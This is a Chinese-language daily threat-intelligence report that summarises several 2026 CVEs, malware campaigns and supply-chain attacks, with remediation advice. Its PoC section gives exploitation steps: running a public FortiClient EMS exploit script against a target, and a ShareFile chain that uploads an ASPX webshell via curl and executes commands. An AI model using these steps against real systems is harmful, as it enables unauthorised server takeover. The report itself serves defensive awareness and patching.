每日安全情报报告 · 2026-04-06

每日安全情报报告 · 2026-04-06发布时间2026-04-06 10:49 CST风险概览 严重 3 项 | 高危 2 项 | 中危 1 项本期重点Fortinet FortiClient EMS 预认证 RCE 在野利用、Progress ShareFile 未授权 RCE 漏洞链、36 个恶意 npm 包供应链攻击一、高危漏洞速报 CVE-2026-35616 — Fortinet FortiClient EMS 预认证 API 绕过导致 RCE字段详情漏洞类型不正确的访问控制CWE-284→ 远程代码执行受影响组件Fortinet FortiClient EMS 7.4.5、7.4.6CVSS v3.1 评分9.1严重在野利用⚠️已确认在野利用Fortinet 于 2026-04-04 公开披露PoC 状态GitHub 已有公开 PoC 代码修复版本FortiClient EMS 7.4.7 或 7.2.11漏洞描述攻击者无需任何身份凭证即可通过精心构造的 API 请求绕过 FortiClient EMS 的全部认证与授权控制从而在服务器上实现任意远程代码执行RCE。由于 EMS 管理所有注册终端的安全策略成功利用此漏洞不仅可完全控制 EMS 服务器还可向其管理的所有 FortiClient 端点下发恶意指令。CVSS 向量CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C修复建议- 立即安装 Fortinet 紧急补丁升级至 FortiClient EMS 7.4.7 或 7.2.11- 临时缓解限制 EMS API 仅对白名单 IP 开放或在 WAF 后方部署- 审计 EMS 访问日志查看是否存在未经身份验证的请求参考链接- Fortinet 官方安全公告 FG-IR-26-099- CVE-2026-35616 技术分析TheCyberThrone- CSA 研究报告 CVE-2026-2699 CVE-2026-2701 — Progress ShareFile 未授权预认证 RCE 漏洞链字段详情漏洞类型认证绕过 路径配置不当导致任意代码执行受影响组件Progress ShareFile Storage Zone Controller ≤ 5.12.3CVSS 评分严重未授权完全服务器接管在野利用暴露实例约30,000 个被勒索软件团伙及 APT 组织积极侦察PoC 状态watchTowr Labs 已公开完整攻击链分析2026-04-02修复版本5.12.4Progress 于 2026-03-10 静默修复漏洞描述两个漏洞可链式组合实现完全无需认证的 RCECVE-2026-2699认证绕过应用程序在返回 HTTP 302 重定向时由于 C# 代码中Redirect()布尔参数为false服务端在发送重定向后并不终止页面执行。攻击者只需拦截响应并移除Location头即可直接访问/ConfigService/Admin.aspx管理控制台。CVE-2026-2701路径遍历 → RCE获得管理员访问后攻击者将文件存储路径重新配置为 Web 根目录如C:\inetpub\wwwroot\ShareFile\...随后上传恶意 ASPX WebShell 并直接访问执行实现 RCE。修复建议- 立即升级至 5.12.4 版本- 检查 Web 日志中是否有对/ConfigService/Admin.aspx的未授权访问- 审计 Web 根目录排查意外的 ASPX 文件参考链接- watchTowr Labs 完整漏洞分析报告- BleepingComputer 报道- Progress ShareFile 漏洞分析数安行 CVE-2026-20093 — Cisco IMC 认证绕过CVSS 9.8持续在野扫描字段详情漏洞类型认证绕过 → 权限提升受影响组件Cisco Integrated Management Controller (IMC)CVSS v3.1 评分9.8严重在野利用攻击者持续主动扫描利用2026-04-01 披露披露日期2026-04-01漏洞描述该漏洞源于密码变更请求处理不当未经身份验证的远程攻击者可通过向易受攻击的 API 端点发送特制请求绕过认证机制并以管理员权限完全控制受影响系统。修复建议立即安装 Cisco 官方补丁暂无缓解措施时限制管理接口的网络访问。参考链接- Cisco Security Advisory- TheHackerNews 报道 CVE-2026-20160 — Cisco ASA/SSM On-Prem 未授权 RCECVSS 9.8无缓解措施字段详情漏洞类型未授权远程代码执行受影响组件Cisco Smart Software Manager (SSM) On-PremCVSS v3.1 评分9.8严重在野利用主动扫描利用暂无官方缓解措施修复状态已发布补丁无临时缓解方案漏洞描述未经身份验证的远程攻击者可在受影响的 Cisco SSM On-Prem 部署上执行任意操作系统命令完全控制目标系统。由于暂无官方缓解措施强烈建议立即部署补丁。参考链接- Cisco 安全公告- CyberSecurityNews 分析 CVE-2026-4747 — FreeBSD 内核 RCEAI 独立发现CVSS 9.2字段详情漏洞类型内核内存管理缺陷 → 远程代码执行受影响组件FreeBSD 内核多个版本CVSS v3.1 评分9.2严重在野利用PoC 已公开由 AI 系统自主发现并生成利用链特别说明由 AI 安全研究员Nicholas Carlini Claude Code在4 小时内独立发现并完成漏洞利用漏洞描述此漏洞的特殊意义在于它由 AI 系统Anthropic Claude Code 安全研究员 Nicholas Carlini在不到 4 小时内独立发现并生成完整利用链标志着 AI 辅助漏洞研究达到全新里程碑。攻击者可利用 FreeBSD 内核的内存管理缺陷实现本地到远程的代码执行提权。参考链接- NotebookCheck 报道Claude Code 4 小时破解 FreeBSD AVrecon 僵尸网络 — FBI 警告369,000 台路由器被入侵遍及 163 国字段详情威胁类型路由器 / IoT 设备恶意软件 住宅代理僵尸网络影响规模感染369,000 台路由器/IoT 设备覆盖163 个国家受影响品牌Cisco、D-Link、Hikvision、MikroTik、Netgear、TP-Link、Zyxel 等约 1,200 种设备披露机构FBI 联合国际执法机构2026-03-12 公告2026-04-05 媒体广泛报道风险等级 中危需立即排查威胁描述AVrecon 是一种使用 C 语言编写的模块化路由器恶意软件针对 MIPS/ARM 架构消费级路由器。感染后设备每 60 秒向 C2 服务器发送心跳包并在攻击者指令下建立 SOCKS 代理隧道将家庭/企业 IP 伪装为攻击跳板用于广告欺诈、密码撞库、银行诈骗等犯罪活动。FBI 已取缔关联的非法代理服务SocksEscort但恶意软件仍持续活跃。防护建议- 立即为路由器/IoT 设备更新固件- 更换已停产EoL设备- 禁用远程管理或设置强密码- 监测网络流量中与已知 AVrecon C2 地址的通信参考链接- FBI 官方安全公告IC3 PDF- FBI 警告 AVrecon 波及 163 国InfoSecBulletin二、漏洞 PoC 情报 PoC-01CVE-2026-35616 — Fortinet FortiClient EMS 预认证 RCE来源GitHub — z3r0h3ro/CVE-2026-35616-poc漏洞概述FortiClient EMS 7.4.5/7.4.6 中特制 API 请求可绕过全部认证控制在服务器上以 SYSTEM 权限执行任意命令。PoC 为 Python 3 脚本支持对单目标进行认证绕过并执行指定命令。使用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/z3r0h3ro/CVE-2026-35616-poc.git cd CVE-2026-35616-poc # 2. 安装依赖 pip3 install requests pyyaml # 或 pip3 install -r requirements.txt # 3. 验证目标仅限授权测试环境 python3 exploit.py -t https://目标EMS服务器:8013 -c whoami # 4. 扩展利用示例查询 EMS 版本信息 python3 exploit.py -t https://目标:8443 -c powershell -c \Get-ItemProperty HKLM:\\SOFTWARE\\Fortinet\\FortiClientEMS | Select Version\影响成功利用后可控制 EMS 服务器SYSTEM 权限并可向其管理的所有FortiClient 端点下发恶意策略。⚠️声明PoC 仅限用于授权的渗透测试和安全研究未经授权使用属违法行为。 PoC-02CVE-2026-2699 CVE-2026-2701 — Progress ShareFile 预认证 RCE 链来源watchTowr Labs 完整分析报告漏洞概述通过两步链式攻击无需任何凭证即可实现对 ShareFile Storage Zone Controller 的完全控制。使用步骤# 步骤一CVE-2026-2699 — 认证绕过 # 直接访问管理控制台服务器会返回 302 重定向到登录页 curl -i https://目标ShareFile/ConfigService/Admin.aspx # 拦截响应并移除 Location 头使用 Burp Suite 等代理工具 # 响应体中包含功能完整的管理控制台页面可直接操作 # 步骤二CVE-2026-2701 — 文件上传路径遍历 → RCE # 通过管理面板将文件存储路径修改为 Web 根目录 # 配置路径示例GUI 操作 # 原路径C:\StorageZones\Data # 修改为C:\inetpub\wwwroot\ShareFile\StorageCenter\documentum # 上传恶意 ASPX WebShell伪装为普通文档 curl -X POST https://目标/upload \ -F filewebshell.aspx;filenamedocument.aspx \ --cookie admin_session从步骤一获取的Cookie # 执行任意命令 curl https://目标/StorageCenter/documentum/document.aspx?cmdwhoami⚠️声明以上步骤仅用于安全研究和授权渗透测试请勿对未经授权的系统使用。 PoC-0336 个恶意 npm 包 — Strapi 插件伪装供应链攻击持久化植入来源TheHackerNews 报道漏洞概述36 个伪装为 Strapi CMS 插件的恶意 npm 包通过postinstall.js脚本在安装时自动利用 Redis/PostgreSQL 建立持久化后门、部署反向 shell、窃取凭证。分析与检测步骤# 1. 检查是否安装了可疑的 Strapi 相关包特征无描述、无仓库地址 npm list --depth0 | grep strapi # 2. 检查 package.json 中的 postinstall 脚本 cat node_modules/package/package.json | grep postinstall # 3. 若发现可疑包立即卸载 npm uninstall 恶意包名 # 4. 审计已安装包使用 npm audit npm audit # 5. 排查系统中是否存在异常的反向 shell 连接 ss -anp | grep ESTABLISHED netstat -antp | grep ESTABLISHED防护建议- 对所有第三方 npm 包执行npm audit并审查 postinstall 脚本- 在 CI/CD 流水线中启用 npm 包签名验证- 监控 Redis/PostgreSQL 异常连接和未经授权的数据库操作参考链接- 36 个恶意 npm 包详情TheHackerNews- 供应链攻击分析SecHub三、网络安全最新文章 文章 1 — Fortinet 修复被积极利用的 CVE-2026-35616 FortiClient EMS 漏洞来源The Hacker News发布日期2026-04-05摘要Fortinet 官方确认 CVE-2026-35616 已在野外被积极利用并发布紧急修复补丁。该漏洞是 FortiClient EMS 7.4.5/7.4.6 中的预认证 API 访问绕过漏洞CVSS 评分 9.1可导致权限提升和完整系统接管。GitHub 上已有公开 PoC攻击武器化风险极高。风险等级 严重已在野利用 PoC 公开阅读原文 文章 2 — Progress ShareFile 新漏洞链允许无需登录即可接管服务器来源watchTowr Labs / Cyber Press发布日期2026-04-02 ~ 04-03摘要watchTowr Labs 的研究人员 Sonny 和 Piotr Bazydlo 披露了 Progress ShareFile Storage Zone Controller 中的漏洞链CVE-2026-2699 CVE-2026-2701。攻击者可通过两步链式利用在完全未经身份验证的情况下接管服务器。约 30,000 个实例暴露在公网已成为勒索软件团伙的高价值目标。风险等级 严重漏洞链公开 大规模暴露阅读原文BleepingComputer 补充报道 文章 3 — Claude Code 泄露事件被黑客武器化Vidar 信息窃取器 GhostSocks 代理木马大规模传播来源Cyber Press / Trend Micro / Bitdefender发布日期2026-04-02 ~ 04-04摘要2026-03-31Anthropic 意外将包含 513,000 行 TypeScript 源代码的 59.8MB 文件捆绑进公共 npm 包anthropic-ai/claude-code中导致 Claude Code 内部架构泄露。威胁行为者迅速在 GitHub 上创建虚假仓库以泄露源码为诱饵诱导开发者下载并运行 Rust 编写的木马ClaudeCode_x64.exe实际植入Vidar v18.7账号/信用卡信息窃取和GhostSocks将设备变为攻击者代理节点。主要目标为搜索泄露代码的开发者群体。风险等级 高危开发者社区重点关注阅读原文Cyber PressBitdefender 分析The Register 报道 文章 4 — BrowserGateLinkedIn 秘密扫描用户浏览器中 6,000 个已安装 Chrome 扩展来源BleepingComputer / Cybernews / CyberKendra发布日期2026-04-03 ~ 04-04摘要独立安全研究人员通过逆向 LinkedIn 生产环境 JavaScript 代码发现 Microsoft 的 LinkedIn 平台在用户每次打开网页时会通过隐藏 JavaScript 脚本静默扫描浏览器中安装的 6,000 个 Chrome 扩展并将扫描结果连同设备指纹数据上报疑似与第三方共享。该事件被称为BrowserGate引发 GDPR 合规担忧研究人员已公开代码引用证据。风险等级 中危用户隐私风险BleepingComputer 报道Cybernews 调查报告 文章 5 — 36 个恶意 npm 包伪装 Strapi 插件利用 Redis/PostgreSQL 部署持久化植入程序来源The Hacker News发布日期2026-04-05摘要安全研究人员在 npm 注册表中发现 36 个伪装为 Strapi CMS 插件的恶意包每个包仅包含三个文件package.json、index.js、postinstall.js且无描述和代码仓库。安装时postinstall.js自动执行利用 Redis 和 PostgreSQL 建立持久化后门、部署反向 shell 并窃取凭证被研究人员认为是针对加密货币平台的定向供应链攻击。风险等级 高危供应链威胁阅读原文TheHackerNews 文章 6 — FBI 警告AVrecon 路由器恶意软件已入侵 163 国 369,000 台设备来源FBI IC3 / InfoSecBulletin / The Cyber Express发布日期2026-03-12官方公告/ 2026-04-05广泛报道摘要FBI 联合国际执法机构发布警告针对路由器和 IoT 设备的 AVrecon 恶意软件已感染全球 163 个国家约 369,000 台设备涵盖 Cisco、D-Link、Hikvision、MikroTik 等 1,200 种设备型号。受感染设备被构建为 SOCKS 代理僵尸网络SocksEscort被犯罪分子用于广告欺诈、密码撞库和银行诈骗。FBI 已取缔 SocksEscort但恶意软件持续活跃。风险等级 中危需排查家庭/企业网络设备FBI 官方安全公告IC3 PDFThe Cyber Express 报道四、威胁情报汇总编号CVE / 事件类型风险等级在野利用修复状态1CVE-2026-35616FortiClient EMS 预认证 RCE 严重9.1✅ 已确认补丁已发布2CVE-2026-2699/2701ShareFile 未授权 RCE 链 严重⚠️ 大规模扫描补丁已发布3CVE-2026-20093Cisco IMC 认证绕过 严重9.8✅ 主动利用补丁已发布4CVE-2026-20160Cisco SSM 未授权 RCE 高危9.8⚠️ 主动扫描补丁已发布无缓解措施5CVE-2026-4747FreeBSD 内核 RCE 高危9.2PoC 公开补丁开发中6Claude Code 泄露供应链/社会工程学 高危✅ 积极利用已删除恶意仓库持续出现736 恶意 npm 包npm 供应链攻击 高危✅ 主动传播npm 已下架需清查8AVrecon 僵尸网络路由器/IoT 恶意软件 中危✅ 持续活跃FBI 已取缔 C2仍需修复设备9BrowserGateLinkedIn用户隐私侵犯 中危持续运营中待监管介入五、今日安全建议【立即】排查 Fortinet FortiClient EMS 版本7.4.5/7.4.6 受影响立即升级至 7.4.7【立即】排查 Progress ShareFile Storage Zone Controller≤5.12.3 受影响立即升级至 5.12.4【立即】部署 Cisco IMC / SSM 补丁防止未授权 RCE 攻击【今日】执行npm audit检查项目依赖中是否存在伪装 Strapi 插件的恶意包【今日】警告开发团队不要从非官方 GitHub 仓库下载 Claude Code 相关代码【本周】更新家庭/企业路由器固件排查 AVrecon 感染迹象检查x和dnssmasq进程【持续】对 LinkedIn 等平台的隐私行为保持关注在企业浏览器中评估相关扩展暴露风险本报告内容来源NVD、The Hacker News、BleepingComputer、watchTowr Labs、Fortinet PSIRT、FBI IC3、Cyber Press、CSA Labs⚠️ 免责声明本报告中的 PoC 信息仅用于安全研究和授权渗透测试请勿用于非法目的。